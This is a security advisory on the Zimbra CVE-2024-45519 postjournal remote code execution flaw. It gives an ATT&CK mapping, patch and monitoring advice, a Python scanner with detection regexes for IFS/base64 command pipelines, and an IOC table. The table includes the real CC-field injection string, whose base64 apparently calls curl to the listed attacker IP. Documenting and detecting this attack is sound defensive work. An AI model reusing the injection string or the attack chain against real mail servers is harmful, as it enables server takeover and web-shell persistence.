I. Targeted Entities
- Small to Medium Government and Business Entities
II. Introduction
A critical remote code execution (RCE) vulnerability, tracked as CVE-2024-45519, has been discovered in Zimbra email servers, posing a significant threat to organizations relying on the platform. The vulnerability resides in Zimbra’s postjournal service, which processes incoming emails over SMTP. It allows attackers to compromise servers by sending specially crafted emails whose CC field triggers arbitrary command execution on the server. Once exploited, the vulnerability can be used to install web shells, providing attackers full access to the compromised server and enabling further network infiltration.
III. Additional Background Information
Zimbra Collaboration, a widely used cloud-hosted platform for email and communication services, has become a prime target for cyberattacks due to its prevalence in corporate and government environments. In September 2024, a critical vulnerability, CVE-2024-45519, was uncovered in Zimbra’s postjournal service. This flaw, caused by improper input validation, allows remote attackers to execute arbitrary commands without authentication. The vulnerability has gained increased attention following the release of a proof-of-concept (PoC) exploit, significantly raising the risk of widespread exploitation. Given Zimbra’s importance across various sectors, the exposure of this vulnerability poses a serious threat to affected systems, making it a key concern in the current cybersecurity landscape.
IV. MITRE ATT&CK
- T1190 – Exploit Public-Facing Application
- The attackers exploit a vulnerability in the Zimbra Collaboration Suite, a public-facing application, by sending specially crafted emails that trigger command execution on the server.
- T1505.003 – Server Software Component: Web Shell
- The attackers create a web shell on the compromised server by concatenating base64-encoded commands from the CC field of the emails, allowing persistent remote access.
- T1059.004 – Command and Scripting Interpreter: Unix Shell
- The attackers execute shell commands on the server by exploiting the input validation flaw, enabling them to control the system via the web shell.
- T1071.001 – Application Layer Protocol: Web Protocols
- The attackers use HTTP requests with specially crafted cookies (JSESSIONID and JACTION) to communicate with the web shell, establishing a command-and-control channel.
- T1105 – Ingress Tool Transfer
- Through the web shell, the attackers download and execute additional malicious code or files onto the compromised server.
- T1132.001 – Data Encoding: Standard Encoding
- The attackers use base64 encoding to encode malicious commands and payloads within the email CC fields and cookies to obfuscate the data and evade detection.
- T1036.005 – Masquerading: Match Legitimate Name or Location
- The attackers send spoofed emails that appear to come from Gmail, leveraging trusted sources to bypass initial security checks.
V. Recommendations
- Patch Management
- Ensure that all Zimbra email server installations, including Zimbra 9.0.0 Patch-41, Zimbra 10.0.9, and Zimbra 10.1.1 (Daffodil), are updated with the latest patches addressing CVE-2024-45519. Systems still running Zimbra 8.8.15, which has received a one-time patch past its EOL, should be prioritized for patching. Regularly monitor for new security updates and apply them as soon as they are released.
- Monitoring and Logging
- Implement comprehensive monitoring and logging to detect suspicious activities targeting the Zimbra postjournal service. Focus on identifying unusual email patterns, base64-encoded commands, or abnormal execution of commands through the postjournal service. Regular log reviews can help catch early signs of exploitation.
- Access Control
- Properly configure Zimbra’s “mynetworks” parameter to restrict access to trusted IP ranges only. If the postjournal service is not required for your organization’s operations, consider disabling it to reduce the attack surface, especially in environments where patching may be delayed.
- Service Management
- Ensure that optional services like postjournal, which is not enabled by default, remain disabled unless explicitly needed. On systems where postjournal is unnecessary, consider removing or disabling it entirely to minimize potential vulnerabilities.
- Vendor Communication
- Establish regular communication with Zimbra to stay informed about the latest security advisories, patches, and best practices. Regularly check the Zimbra Security Center and set up notifications to receive updates on new vulnerabilities and security patches promptly.
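As an added example (not code from the advisory, from Cyber Florida, or from Zimbra), the check below applies the Monitoring and Logging recommendation to recipient addresses pulled from constructed Postfix-style log lines: it flags the `${IFS}`/`$(IFS)` plus `base64` pipeline shape of the published IOC first, then shell metacharacters that RFC 5321 permits but no local hook should ever receive, then anything outside a conservative policy allow-list. The function names, regexes and log format are assumptions, not Zimbra's.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log lines in a Postfix-like "to=<address>" shape. The third
# mirrors the IOC's structure (quote break-out, IFS word separators, base64
# decode stage) but decodes only to the harmless string "ABC".
SAMPLE_LOG = [
    "Oct  1 09:14:02 mx1 postfix/smtpd[4121]: from=<alice@example.org> to=<bob@example.net>",
    "Oct  1 09:14:07 mx1 postfix/smtpd[4121]: from=<news@example.org> to=<o'brien.jr@example.net>",
    "Oct  1 09:15:33 mx1 postfix/smtpd[4139]: from=<spoof@gmail.com> "
    "to=<aaa'echo${IFS}QUJD|base64$(IFS)-d'aaa@mail.com>",
]

# Strongest signal: the IOC's word-splitting and decode tokens. ${IFS} or $(IFS)
# stands in for a space, and base64 turns an opaque blob into a command.
PIPELINE_TOKENS = re.compile(r"\$[{(]IFS[})]|base64", re.IGNORECASE)

# Characters a shell interprets. RFC 5321 atext allows several of them in a
# local part, so apostrophe names (o'brien) are a known false-positive source
# and get a lower-severity verdict for triage rather than a pass.
SHELL_META = re.compile(r"[`$|;&<>(){}'\"\\]")

# Policy allow-list for any address a local hook may process: deliberately
# narrower than RFC 5321, and requiring a dotted domain.
POLICY_ADDRESS = re.compile(r"^[A-Za-z0-9._+=-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

TO_FIELD = re.compile(r"to=<([^>]*)>")


def classify_recipient(addr: str) -> Optional[str]:
    """Return a verdict for one recipient address, or None when it is clean."""
    if PIPELINE_TOKENS.search(addr):
        return "command-pipeline"
    if SHELL_META.search(addr):
        return "shell-metacharacter"
    if not POLICY_ADDRESS.match(addr):
        return "policy-violation"
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_no, address, verdict) for every flagged recipient in the log."""
    hits = []
    for n, line in enumerate(lines, 1):
        for addr in TO_FIELD.findall(line):
            verdict = classify_recipient(addr)
            if verdict:
                hits.append((n, addr, verdict))
    return hits


if __name__ == "__main__":
    for line_no, addr, verdict in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {verdict}: {addr}")
```

Run the same classifier over the CC header of messages queued for postjournal, and treat a "command-pipeline" verdict as a trigger for the web-shell and cookie checks described under T1505.003 and T1071.001.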
VI. IOCs (Indicators of Compromise)
Type | Indicator |
---|---|
IP Address | 79.124.49[.]86 |
Port | 10027 |
Base64-encoded String | ppp’echo${IFS} Li4vLj4vY29tbW9uL2Jpbi 9jdXJsIGh0dHA6LY830S 4xMjQuNDkuODY6NDQZL 3RwdnRnYmp3ZWV2dnV vbWJ5d2xrdGhsbGpkdXB 4Znlz|base64$(IFS)-di shipppppp@mail.com |
Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Thiago Reis Pagliaroni, Benjamin Price